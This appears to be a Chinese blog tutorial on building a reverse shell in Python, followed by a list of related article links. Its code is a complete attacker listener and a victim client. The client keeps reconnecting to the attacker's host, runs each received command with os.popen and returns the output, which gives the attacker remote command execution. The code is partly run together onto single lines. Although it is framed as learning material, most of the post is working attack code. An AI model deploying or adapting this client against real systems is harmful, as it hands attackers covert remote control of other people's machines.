今天学习内容就是反弹shell啦~~
当服务器端攻击客户端时，此时客户端IP地址未知，所以要使用反向shell
在这里分别写服务器端代码和客户端代码；注：每次运行时要先开服务器端
服务器端(攻击者，导入模块：import socket)
基本步骤：
1、创建套接字

s=socket.socket()

2、进行绑定(ip:允许连接的ip，服务器端端口)

s.bind(("0.0.0.0",6666))

3、允许连入的主机数

s.listen()

4、创建接口与连入的主机地址

con,addr=s.accept()

具体代码：

import sockets = socket.socket()
s.bind(('0.0.0.0',6666))
s.listen(5)
con,addr = s.accept()
print(addr)for i in range(3):cmd = input('第%d条命令：'%(i+1))con.send(cmd.encode())result = con.recv(65536)print(result.decode())
con.close()

客户端(被攻击者，导入模块：import socket，import os)
基本步骤：
1、创建套接字，连接服务器(ip：服务器端，端口：服务器端)

s=socket.socket()
s.connect(('127.0.0.1',6666))

2、收发数据

cmd = s.recv(1024).decode()
s.send(result.encode())

3、关闭套接字

s.close()

具体代码：

import os
import time
import sockets = socket.socket()while 1:try:s.connect(('127.0.0.1',6666))breakexcept:time.sleep(5)for i in range(3):cmd = s.recv(1024).decode()print('收到的第%d条命令'%(i+1),cmd)result = os.popen(cmd).read()if result:s.send(result.encode())else:if cmd[:2] == 'cd':os.chdir(cmd[2:].strip())s.send(b'OK!')s.close()

实现效果图：
客户端：

服务器端：

enen~~就酱紫

Windows下的反弹shell相关推荐

1. Windows下使用标准Shell接口遍历文件和文件夹

   Windows下使用标准Shell接口遍历文件和文件夹(1) 在Windows中我们经常需要遍历一个文件夹或者遍历一个磁盘.本文介绍如何使用标准的Shell接口进行遍历.在介绍过程中会逐步的实现一个类 ...

2. windows下的正向shell

   学习渗透怎么能不会shell呢,今天和明天的学习内容就是正向shell和反弹shell啦~~ shell:在计算机科学中,Shell俗称壳(用来区别于核),是指"为使用者提供操作界面&quo ...

3. 冰蝎下的反弹shell连接msfconsole

   文章目录 前言 一.使用木马getshell 1.搭建环境 二.冰蝎配置 三.kali监听 总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据.为此我带着表 ...

4. Windows下怎么练习shell脚本

   最近对shell脚本编程比较感兴趣,苦于笔者的笔记本是windows而不是linux.而且: 1. win7系统 (看了网上的让我升级到win10之后,win10提供了一个完整的,基于Ubuntu的B ...

5. 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

   中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...

6. windows下jenkins执行shell报错

   创建完Job之后,执行shell脚本报错 Publish] $ sh -xe C:\Windows\TEMP\jenkins1513512433272584870.sh 办法是修改 Manage Je ...

7. Windows下VSCode运行shell

   最简单办法安装git并将Git bash目录比如C:\Program Files (x86)\Git\bin\bash.exe添加到环境变量中 VSCode终端输入bash进入Bash模式了,可以执行 ...

8. windows下通过adb shell进入data目录

   2019独角兽企业重金招聘Python工程师标准>>> http://blog.csdn.net/chrisfxs/article/details/37656083 转载于:http ...

9. windows下编辑的shell复制到linux无法执行

   是因为格式不对 可用vim编辑器转换格式 在vim中执行命令: set ff=unix 设置打开方式为unix

最新文章

1. 中国式姥姥上热搜感动无数人：有妈妈在，我才敢生娃
2. OC与c混编实现Java的String的hashcode()函数
3. c语言解决函数变参数问题 va_list
4. javascript删除元素节点
5. 怎么在搭建Android开发环境？
6. 高级数据结构与算法 | 回溯算法（Back Tracking Method）
7. 02.es的节点发现和集群构建
8. 西门子s7-200解密软件下载_西门子S7200仿真软件如何使用？
9. Linux 常用命令整理
10. matlab安装第三方库,Matlab调用cpp+第三方库
11. 小程序快速入门：wxss的使用
12. ms08067 分析与利用
13. 【论文学习】《One-shot Voice Conversion by Separating Speaker and Content Representations with IN》
14. 如何运用时间管理四象限法则去管理时间？
15. 外国小伙发现乌云是黑色的……
16. android里qq登录界面,Android仿QQ登陆窗口实现原理
17. Flutter 实现安卓原生系统级悬浮窗
18. 液压管路渗漏图像识别检测方法研究
19. 重庆大学计算机学院最好老师,“一切都是最好的安排”——蒲俊杰老师喜获重庆大学“最受学生欢迎老师”称号...
20. 计算机网络基础知识--TCP/IP协议、IP分组、TCP传输

热门文章

1. 【重复制造精讲】报告点（Reporting Point）简介
2. 在命令行下进行Oracle用户解锁
3. java的(PO,VO,TO,BO,DAO,POJO)解释
4. 用户退出后还锁表的处理方法
5. 一个现金流量表的代码
6. 成本要素区分成本中心
7. 通过BI专题场景，深度剖析制造行业如何提高设备利用率？
8. 宗馥莉：艰难的接班人与幸运的创二代
9. java图形用户界面概述_Java中图形用户界面概述
10. adb 连接某个wifi_一加7 Pro全局强制开启90Hz刷新率的办法（附ADB文件下载）